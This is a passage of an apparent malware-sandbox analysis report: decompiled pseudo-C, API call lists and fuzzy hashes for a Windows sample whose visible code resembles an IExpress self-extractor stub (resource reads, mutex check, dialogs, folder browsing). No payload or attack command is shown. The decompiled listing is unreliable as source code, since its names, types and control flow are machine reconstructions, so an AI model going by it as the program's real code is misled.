                                                                                                                                                                                                        									if( *0xe891e5 == 0x5c) {
                                                                                                                                                                                                        										goto L31;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									goto L30;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								_push(0);
                                                                                                                                                                                                        								_push(0x10);
                                                                                                                                                                                                        								_push(0);
                                                                                                                                                                                                        								_push(0);
                                                                                                                                                                                                        								_t58 = 0x4be;
                                                                                                                                                                                                        								goto L25;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_t32 = E00E844B9(_t64, 0x54a, 0xe891e4, 0, 0x20, 4);
                                                                                                                                                                                                        							__eflags = _t32 - 6;
                                                                                                                                                                                                        							if(_t32 != 6) {
                                                                                                                                                                                                        								goto L35;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_t33 = CreateDirectoryA(0xe891e4, 0);
                                                                                                                                                                                                        							__eflags = _t33;
                                                                                                                                                                                                        							if(_t33 != 0) {
                                                                                                                                                                                                        								goto L26;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_push(0);
                                                                                                                                                                                                        							_push(0x10);
                                                                                                                                                                                                        							_push(0);
                                                                                                                                                                                                        							_push(0xe891e4);
                                                                                                                                                                                                        							_t58 = 0x4cb;
                                                                                                                                                                                                        							goto L25;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						__eflags =  *0xe891e4 - 0x5c;
                                                                                                                                                                                                        						if( *0xe891e4 != 0x5c) {
                                                                                                                                                                                                        							goto L32;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						__eflags = _t24 - 0x5c;
                                                                                                                                                                                                        						if(_t24 != 0x5c) {
                                                                                                                                                                                                        							goto L32;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						goto L21;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t34 = _t20 - 1;
                                                                                                                                                                                                        					__eflags = _t34;
                                                                                                                                                                                                        					if(_t34 == 0) {
                                                                                                                                                                                                        						EndDialog(_t64, 0);
                                                                                                                                                                                                        						 *0xe89124 = 0x800704c7;
                                                                                                                                                                                                        						goto L39;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					__eflags = _t34 != 0x834;
                                                                                                                                                                                                        					if(_t34 != 0x834) {
                                                                                                                                                                                                        						goto L36;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t37 = LoadStringA( *0xe89a3c, 0x3e8, 0xe88598, 0x200);
                                                                                                                                                                                                        					__eflags = _t37;
                                                                                                                                                                                                        					if(_t37 != 0) {
                                                                                                                                                                                                        						_t38 = E00E84224(_t64, _t46, _t46);
                                                                                                                                                                                                        						__eflags = _t38;
                                                                                                                                                                                                        						if(_t38 == 0) {
                                                                                                                                                                                                        							goto L36;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t39 = SetDlgItemTextA(_t64, 0x835, 0xe887a0);
                                                                                                                                                                                                        						__eflags = _t39;
                                                                                                                                                                                                        						if(_t39 != 0) {
                                                                                                                                                                                                        							goto L36;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t63 = 0x4c0;
                                                                                                                                                                                                        						L9:
                                                                                                                                                                                                        						E00E844B9(_t64, _t63, 0, 0, 0x10, 0);
                                                                                                                                                                                                        						_push(0);
                                                                                                                                                                                                        						goto L38;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t63 = 0x4b1;
                                                                                                                                                                                                        					goto L9;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return 0;
                                                                                                                                                                                                        			}

























                                                                                                                                                                                                        0x00e8329f
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e832b0
                                                                                                                                                                                                        0x00e832b6
                                                                                                                                                                                                        0x00e832b8
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e832be
                                                                                                                                                                                                        0x00e83280
                                                                                                                                                                                                        0x00e83289
                                                                                                                                                                                                        0x00e8328e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e8328e
                                                                                                                                                                                                        0x00e8327b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e8327b
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • LoadStringA.USER32(000003E8,00E88598,00000200), ref: 00E83271
                                                                                                                                                                                                        • GetDesktopWindow.USER32 ref: 00E833E2
                                                                                                                                                                                                        • SetWindowTextA.USER32(?,cent), ref: 00E833F7
                                                                                                                                                                                                        • SendDlgItemMessageA.USER32(?,00000835,000000C5,00000103,00000000), ref: 00E83410
                                                                                                                                                                                                        • GetDlgItem.USER32(?,00000836), ref: 00E83426
                                                                                                                                                                                                        • EnableWindow.USER32(00000000), ref: 00E8342D
                                                                                                                                                                                                        • EndDialog.USER32(?,00000000), ref: 00E8343F
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.430849344.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.430840109.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.430860781.0000000000E88000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_e80000_iOqzwbUlln.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Window$Item$DesktopDialogEnableLoadMessageSendStringText
                                                                                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$cent
                                                                                                                                                                                                        • API String ID: 2418873061-3817845457
                                                                                                                                                                                                        • Opcode ID: 092515aa370895e9df7aefe3ad5d5b28c484981fd8f3ea0ee7393d1fdf432ba3
                                                                                                                                                                                                        • Instruction ID: 20e6a05b18b7b15f0ac9575754e29564dd97d7530e769f27cac4d4f7df55582b
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 092515aa370895e9df7aefe3ad5d5b28c484981fd8f3ea0ee7393d1fdf432ba3
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 24515A703422417FF7227B369C8CFBB6949DB45F58F146039F61DF60E1CAA48A059361
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 93%
                                                                                                                                                                                                        			E00E82CAA(struct HINSTANCE__* __ecx, void* __edx, void* __eflags) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t13;
                                                                                                                                                                                                        				void* _t20;
                                                                                                                                                                                                        				void* _t23;
                                                                                                                                                                                                        				void* _t27;
                                                                                                                                                                                                        				struct HRSRC__* _t31;
                                                                                                                                                                                                        				intOrPtr _t33;
                                                                                                                                                                                                        				void* _t43;
                                                                                                                                                                                                        				void* _t48;
                                                                                                                                                                                                        				signed int _t65;
                                                                                                                                                                                                        				struct HINSTANCE__* _t66;
                                                                                                                                                                                                        				signed int _t67;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t13 =  *0xe88004; // 0x18391fe1
                                                                                                                                                                                                        				_v8 = _t13 ^ _t67;
                                                                                                                                                                                                        				_t65 = 0;
                                                                                                                                                                                                        				_t66 = __ecx;
                                                                                                                                                                                                        				_t48 = __edx;
                                                                                                                                                                                                        				 *0xe89a3c = __ecx;
                                                                                                                                                                                                        				memset(0xe89140, 0, 0x8fc);
                                                                                                                                                                                                        				memset(0xe88a20, 0, 0x32c);
                                                                                                                                                                                                        				memset(0xe888c0, 0, 0x104);
                                                                                                                                                                                                        				 *0xe893ec = 1;
                                                                                                                                                                                                        				_t20 = E00E8468F("TITLE", 0xe89154, 0x7f);
                                                                                                                                                                                                        				if(_t20 == 0 || _t20 > 0x80) {
                                                                                                                                                                                                        					_t64 = 0x4b1;
                                                                                                                                                                                                        					goto L32;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t27 = CreateEventA(0, 1, 1, 0);
                                                                                                                                                                                                        					 *0xe8858c = _t27;
                                                                                                                                                                                                        					SetEvent(_t27);
                                                                                                                                                                                                        					_t64 = 0xe89a34;
                                                                                                                                                                                                        					if(E00E8468F("EXTRACTOPT", 0xe89a34, 4) != 0) {
                                                                                                                                                                                                        						if(( *0xe89a34 & 0x000000c0) == 0) {
                                                                                                                                                                                                        							L12:
                                                                                                                                                                                                        							 *0xe89120 =  *0xe89120 & _t65;
                                                                                                                                                                                                        							if(E00E85C9E(_t48, _t48, _t65, _t66) != 0) {
                                                                                                                                                                                                        								if( *0xe88a3a == 0) {
                                                                                                                                                                                                        									_t31 = FindResourceA(_t66, "VERCHECK", 0xa);
                                                                                                                                                                                                        									if(_t31 != 0) {
                                                                                                                                                                                                        										_t65 = LoadResource(_t66, _t31);
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									if( *0xe88184 != 0) {
                                                                                                                                                                                                        										__imp__#17();
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									if( *0xe88a24 == 0) {
                                                                                                                                                                                                        										_t57 = _t65;
                                                                                                                                                                                                        										if(E00E836EE(_t65) == 0) {
                                                                                                                                                                                                        											goto L33;
                                                                                                                                                                                                        										} else {
                                                                                                                                                                                                        											_t33 =  *0xe89a40; // 0x3
                                                                                                                                                                                                        											_t48 = 1;
                                                                                                                                                                                                        											if(_t33 == 1 || _t33 == 2 || _t33 == 3) {
                                                                                                                                                                                                        												if(( *0xe89a34 & 0x00000100) == 0 || ( *0xe88a38 & 0x00000001) != 0 || E00E818A3(_t64, _t66) != 0) {
                                                                                                                                                                                                        													goto L30;
                                                                                                                                                                                                        												} else {
                                                                                                                                                                                                        													_t64 = 0x7d6;
                                                                                                                                                                                                        													if(E00E86517(_t57, 0x7d6, _t34, E00E819E0, 0x547, 0x83e) != 0x83d) {
                                                                                                                                                                                                        														goto L33;
                                                                                                                                                                                                        													} else {
                                                                                                                                                                                                        														goto L30;
                                                                                                                                                                                                        													}
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        											} else {
                                                                                                                                                                                                        												L30:
                                                                                                                                                                                                        												_t23 = _t48;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                        										_t23 = 1;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									E00E82390(0xe88a3a);
                                                                                                                                                                                                        									goto L33;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								_t64 = 0x520;
                                                                                                                                                                                                        								L32:
                                                                                                                                                                                                        								E00E844B9(0, _t64, 0, 0, 0x10, 0);
                                                                                                                                                                                                        								goto L33;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							_t64 =  &_v268;
                                                                                                                                                                                                        							if(E00E8468F("INSTANCECHECK",  &_v268, 0x104) == 0) {
                                                                                                                                                                                                        								goto L3;
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								_t43 = CreateMutexA(0, 1,  &_v268);
                                                                                                                                                                                                        								 *0xe88588 = _t43;
                                                                                                                                                                                                        								if(_t43 == 0 || GetLastError() != 0xb7) {
                                                                                                                                                                                                        									goto L12;
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									if(( *0xe89a34 & 0x00000080) == 0) {
                                                                                                                                                                                                        										_t64 = 0x524;
                                                                                                                                                                                                        										if(E00E844B9(0, 0x524, ?str?, 0, 0x20, 4) == 6) {
                                                                                                                                                                                                        											goto L12;
                                                                                                                                                                                                        										} else {
                                                                                                                                                                                                        											goto L11;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                        										_t64 = 0x54b;
                                                                                                                                                                                                        										E00E844B9(0, 0x54b, "cent", 0, 0x10, 0);
                                                                                                                                                                                                        										L11:
                                                                                                                                                                                                        										CloseHandle( *0xe88588);
                                                                                                                                                                                                        										 *0xe89124 = 0x800700b7;
                                                                                                                                                                                                        										goto L33;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						L3:
                                                                                                                                                                                                        						_t64 = 0x4b1;
                                                                                                                                                                                                        						E00E844B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                        						 *0xe89124 = 0x80070714;
                                                                                                                                                                                                        						L33:
                                                                                                                                                                                                        						_t23 = 0;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return E00E86CE0(_t23, _t48, _v8 ^ _t67, _t64, _t65, _t66);
                                                                                                                                                                                                        			}




















                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • memset.MSVCRT ref: 00E82CD9
                                                                                                                                                                                                        • memset.MSVCRT ref: 00E82CE9
                                                                                                                                                                                                        • memset.MSVCRT ref: 00E82CF9
                                                                                                                                                                                                          • Part of subcall function 00E8468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00E846A0
                                                                                                                                                                                                          • Part of subcall function 00E8468F: SizeofResource.KERNEL32(00000000,00000000,?,00E82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00E846A9
                                                                                                                                                                                                          • Part of subcall function 00E8468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00E846C3
                                                                                                                                                                                                          • Part of subcall function 00E8468F: LoadResource.KERNEL32(00000000,00000000,?,00E82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00E846CC
                                                                                                                                                                                                          • Part of subcall function 00E8468F: LockResource.KERNEL32(00000000,?,00E82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00E846D3
                                                                                                                                                                                                          • Part of subcall function 00E8468F: memcpy_s.MSVCRT ref: 00E846E5
                                                                                                                                                                                                          • Part of subcall function 00E8468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00E846EF
                                                                                                                                                                                                        • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00E82D34
                                                                                                                                                                                                        • SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,00000002,00000000), ref: 00E82D40
                                                                                                                                                                                                        • CreateMutexA.KERNEL32(00000000,00000001,?,00000104,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 00E82DAE
                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 00E82DBD
                                                                                                                                                                                                        • CloseHandle.KERNEL32(cent,00000000,00000020,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 00E82E0A
                                                                                                                                                                                                          • Part of subcall function 00E844B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00E84518
                                                                                                                                                                                                          • Part of subcall function 00E844B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 00E84554
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.430849344.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.430840109.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.430860781.0000000000E88000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_e80000_iOqzwbUlln.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Resource$memset$CreateEventFindLoad$CloseErrorFreeHandleLastLockMessageMutexSizeofStringmemcpy_s
                                                                                                                                                                                                        • String ID: EXTRACTOPT$INSTANCECHECK$TITLE$VERCHECK$cent
                                                                                                                                                                                                        • API String ID: 1002816675-2654900392
                                                                                                                                                                                                        • Opcode ID: da8e677b00f9990655f1f1dd5d6066220a736edcc698b4467021eeb039e60898
                                                                                                                                                                                                        • Instruction ID: 6f541449118b187afcbab0fba2706662714c9c327d2d46ae081ecdf9d25b2a0d
                                                                                                                                                                                                        • Opcode Fuzzy Hash: da8e677b00f9990655f1f1dd5d6066220a736edcc698b4467021eeb039e60898
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 335123B07403016EE725BB728D4AB7B36D9EB81704F48602EBB4DF51E1DBB48845D72A
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 81%
                                                                                                                                                                                                        			E00E834F0(struct HWND__* _a4, intOrPtr _a8, int _a12) {
                                                                                                                                                                                                        				void* _t9;
                                                                                                                                                                                                        				void* _t12;
                                                                                                                                                                                                        				void* _t13;
                                                                                                                                                                                                        				void* _t17;
                                                                                                                                                                                                        				void* _t23;
                                                                                                                                                                                                        				void* _t25;
                                                                                                                                                                                                        				struct HWND__* _t35;
                                                                                                                                                                                                        				struct HWND__* _t38;
                                                                                                                                                                                                        				void* _t39;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t9 = _a8 - 0x10;
                                                                                                                                                                                                        				if(_t9 == 0) {
                                                                                                                                                                                                        					__eflags = 1;
                                                                                                                                                                                                        					L19:
                                                                                                                                                                                                        					_push(0);
                                                                                                                                                                                                        					 *0xe891d8 = 1;
                                                                                                                                                                                                        					L20:
                                                                                                                                                                                                        					_push(_a4);
                                                                                                                                                                                                        					L21:
                                                                                                                                                                                                        					EndDialog();
                                                                                                                                                                                                        					L22:
                                                                                                                                                                                                        					return 1;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_push(1);
                                                                                                                                                                                                        				_pop(1);
                                                                                                                                                                                                        				_t12 = _t9 - 0xf2;
                                                                                                                                                                                                        				if(_t12 == 0) {
                                                                                                                                                                                                        					__eflags = _a12 - 0x1b;
                                                                                                                                                                                                        					if(_a12 != 0x1b) {
                                                                                                                                                                                                        						goto L22;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					goto L19;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t13 = _t12 - 0xe;
                                                                                                                                                                                                        				if(_t13 == 0) {
                                                                                                                                                                                                        					_t35 = _a4;
                                                                                                                                                                                                        					 *0xe88584 = _t35;
                                                                                                                                                                                                        					E00E843D0(_t35, GetDesktopWindow());
                                                                                                                                                                                                        					__eflags =  *0xe88184; // 0x1
                                                                                                                                                                                                        					if(__eflags != 0) {
                                                                                                                                                                                                        						SendMessageA(GetDlgItem(_t35, 0x83b), 0x464, 0, 0xbb9);
                                                                                                                                                                                                        						SendMessageA(GetDlgItem(_t35, 0x83b), 0x465, 0xffffffff, 0xffff0000);
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					SetWindowTextA(_t35, "cent");
                                                                                                                                                                                                        					_t17 = CreateThread(0, 0, E00E84FE0, 0, 0, 0xe88798);
                                                                                                                                                                                                        					 *0xe8879c = _t17;
                                                                                                                                                                                                        					__eflags = _t17;
                                                                                                                                                                                                        					if(_t17 != 0) {
                                                                                                                                                                                                        						goto L22;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						E00E844B9(_t35, 0x4b8, 0, 0, 0x10, 0);
                                                                                                                                                                                                        						_push(0);
                                                                                                                                                                                                        						_push(_t35);
                                                                                                                                                                                                        						goto L21;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t23 = _t13 - 1;
                                                                                                                                                                                                        				if(_t23 == 0) {
                                                                                                                                                                                                        					__eflags = _a12 - 2;
                                                                                                                                                                                                        					if(_a12 != 2) {
                                                                                                                                                                                                        						goto L22;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					ResetEvent( *0xe8858c);
                                                                                                                                                                                                        					_t38 =  *0xe88584; // 0x0
                                                                                                                                                                                                        					_t25 = E00E844B9(_t38, 0x4b2, 0xe81140, 0, 0x20, 4);
                                                                                                                                                                                                        					__eflags = _t25 - 6;
                                                                                                                                                                                                        					if(_t25 == 6) {
                                                                                                                                                                                                        						L11:
                                                                                                                                                                                                        						 *0xe891d8 = 1;
                                                                                                                                                                                                        						SetEvent( *0xe8858c);
                                                                                                                                                                                                        						_t39 =  *0xe8879c; // 0x0
                                                                                                                                                                                                        						E00E83680(_t39);
                                                                                                                                                                                                        						_push(0);
                                                                                                                                                                                                        						goto L20;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					__eflags = _t25 - 1;
                                                                                                                                                                                                        					if(_t25 == 1) {
                                                                                                                                                                                                        						goto L11;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					SetEvent( *0xe8858c);
                                                                                                                                                                                                        					goto L22;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				if(_t23 == 0xe90) {
                                                                                                                                                                                                        					TerminateThread( *0xe8879c, 0);
                                                                                                                                                                                                        					EndDialog(_a4, _a12);
                                                                                                                                                                                                        					return 1;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return 0;
                                                                                                                                                                                                        			}












                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e83661
                                                                                                                                                                                                        0x00e83512
                                                                                                                                                                                                        0x00e83515
                                                                                                                                                                                                        0x00e835be
                                                                                                                                                                                                        0x00e835c1
                                                                                                                                                                                                        0x00e835d1
                                                                                                                                                                                                        0x00e835d8
                                                                                                                                                                                                        0x00e835de
                                                                                                                                                                                                        0x00e835f8
                                                                                                                                                                                                        0x00e83617
                                                                                                                                                                                                        0x00e83617
                                                                                                                                                                                                        0x00e83623
                                                                                                                                                                                                        0x00e83637
                                                                                                                                                                                                        0x00e8363d
                                                                                                                                                                                                        0x00e83642
                                                                                                                                                                                                        0x00e83644
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e83646
                                                                                                                                                                                                        0x00e83652
                                                                                                                                                                                                        0x00e83657
                                                                                                                                                                                                        0x00e83658
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e83658
                                                                                                                                                                                                        0x00e83644
                                                                                                                                                                                                        0x00e8351b
                                                                                                                                                                                                        0x00e8351d
                                                                                                                                                                                                        0x00e8354f
                                                                                                                                                                                                        0x00e83553
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e8355f
                                                                                                                                                                                                        0x00e83565
                                                                                                                                                                                                        0x00e8357c
                                                                                                                                                                                                        0x00e83581
                                                                                                                                                                                                        0x00e83584
                                                                                                                                                                                                        0x00e8359b
                                                                                                                                                                                                        0x00e835a1
                                                                                                                                                                                                        0x00e835a7
                                                                                                                                                                                                        0x00e835ad
                                                                                                                                                                                                        0x00e835b3
                                                                                                                                                                                                        0x00e835b8
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e835b8
                                                                                                                                                                                                        0x00e83586
                                                                                                                                                                                                        0x00e83588
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e83590
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e83590
                                                                                                                                                                                                        0x00e83524
                                                                                                                                                                                                        0x00e83535
                                                                                                                                                                                                        0x00e83541
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e83549
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • TerminateThread.KERNEL32(00000000), ref: 00E83535
                                                                                                                                                                                                        • EndDialog.USER32(?,?), ref: 00E83541
                                                                                                                                                                                                        • ResetEvent.KERNEL32 ref: 00E8355F
                                                                                                                                                                                                        • SetEvent.KERNEL32(00E81140,00000000,00000020,00000004), ref: 00E83590
                                                                                                                                                                                                        • GetDesktopWindow.USER32 ref: 00E835C7
                                                                                                                                                                                                        • GetDlgItem.USER32(?,0000083B), ref: 00E835F1
                                                                                                                                                                                                        • SendMessageA.USER32(00000000), ref: 00E835F8
                                                                                                                                                                                                        • GetDlgItem.USER32(?,0000083B), ref: 00E83610
                                                                                                                                                                                                        • SendMessageA.USER32(00000000), ref: 00E83617
                                                                                                                                                                                                        • SetWindowTextA.USER32(?,cent), ref: 00E83623
                                                                                                                                                                                                        • CreateThread.KERNEL32 ref: 00E83637
                                                                                                                                                                                                        • EndDialog.USER32(?,00000000), ref: 00E83671
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.430849344.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.430840109.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.430860781.0000000000E88000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_e80000_iOqzwbUlln.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: DialogEventItemMessageSendThreadWindow$CreateDesktopResetTerminateText
                                                                                                                                                                                                        • String ID: cent
                                                                                                                                                                                                        • API String ID: 2406144884-3940384054
                                                                                                                                                                                                        • Opcode ID: 9b0f377788f69a2c30f57699ba8657a2b6c5acbe5a1c56ef7fb7cf469c0293df
                                                                                                                                                                                                        • Instruction ID: cb72fdb19598145c0f39c6fccfc11ccd0229403c0013d6aa7300b937c86b1cac
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9b0f377788f69a2c30f57699ba8657a2b6c5acbe5a1c56ef7fb7cf469c0293df
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3A31D3B0241301BFE7206F3AED4DE2B3A69E785F10F58552AFA0EB52A0DA758904DB50
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 50%
                                                                                                                                                                                                        			E00E84224(char __ecx) {
                                                                                                                                                                                                        				char* _v8;
                                                                                                                                                                                                        				_Unknown_base(*)()* _v12;
                                                                                                                                                                                                        				_Unknown_base(*)()* _v16;
                                                                                                                                                                                                        				_Unknown_base(*)()* _v20;
                                                                                                                                                                                                        				char* _v28;
                                                                                                                                                                                                        				intOrPtr _v32;
                                                                                                                                                                                                        				intOrPtr _v36;
                                                                                                                                                                                                        				intOrPtr _v40;
                                                                                                                                                                                                        				char _v44;
                                                                                                                                                                                                        				char _v48;
                                                                                                                                                                                                        				char _v52;
                                                                                                                                                                                                        				_Unknown_base(*)()* _t26;
                                                                                                                                                                                                        				_Unknown_base(*)()* _t28;
                                                                                                                                                                                                        				_Unknown_base(*)()* _t29;
                                                                                                                                                                                                        				_Unknown_base(*)()* _t32;
                                                                                                                                                                                                        				char _t42;
                                                                                                                                                                                                        				char* _t44;
                                                                                                                                                                                                        				char* _t61;
                                                                                                                                                                                                        				void* _t63;
                                                                                                                                                                                                        				char* _t65;
                                                                                                                                                                                                        				struct HINSTANCE__* _t66;
                                                                                                                                                                                                        				char _t67;
                                                                                                                                                                                                        				void* _t71;
                                                                                                                                                                                                        				char _t76;
                                                                                                                                                                                                        				intOrPtr _t85;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t67 = __ecx;
                                                                                                                                                                                                        				_t66 = LoadLibraryA("SHELL32.DLL");
                                                                                                                                                                                                        				if(_t66 == 0) {
                                                                                                                                                                                                        					_t63 = 0x4c2;
                                                                                                                                                                                                        					L22:
                                                                                                                                                                                                        					E00E844B9(_t67, _t63, 0, 0, 0x10, 0);
                                                                                                                                                                                                        					return 0;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t26 = GetProcAddress(_t66, "SHBrowseForFolder");
                                                                                                                                                                                                        				_v12 = _t26;
                                                                                                                                                                                                        				if(_t26 == 0) {
                                                                                                                                                                                                        					L20:
                                                                                                                                                                                                        					FreeLibrary(_t66);
                                                                                                                                                                                                        					_t63 = 0x4c1;
                                                                                                                                                                                                        					goto L22;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t28 = GetProcAddress(_t66, 0xc3);
                                                                                                                                                                                                        				_v20 = _t28;
                                                                                                                                                                                                        				if(_t28 == 0) {
                                                                                                                                                                                                        					goto L20;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t29 = GetProcAddress(_t66, "SHGetPathFromIDList");
                                                                                                                                                                                                        				_v16 = _t29;
                                                                                                                                                                                                        				if(_t29 == 0) {
                                                                                                                                                                                                        					goto L20;
                                                                                                                                                                                                        				}
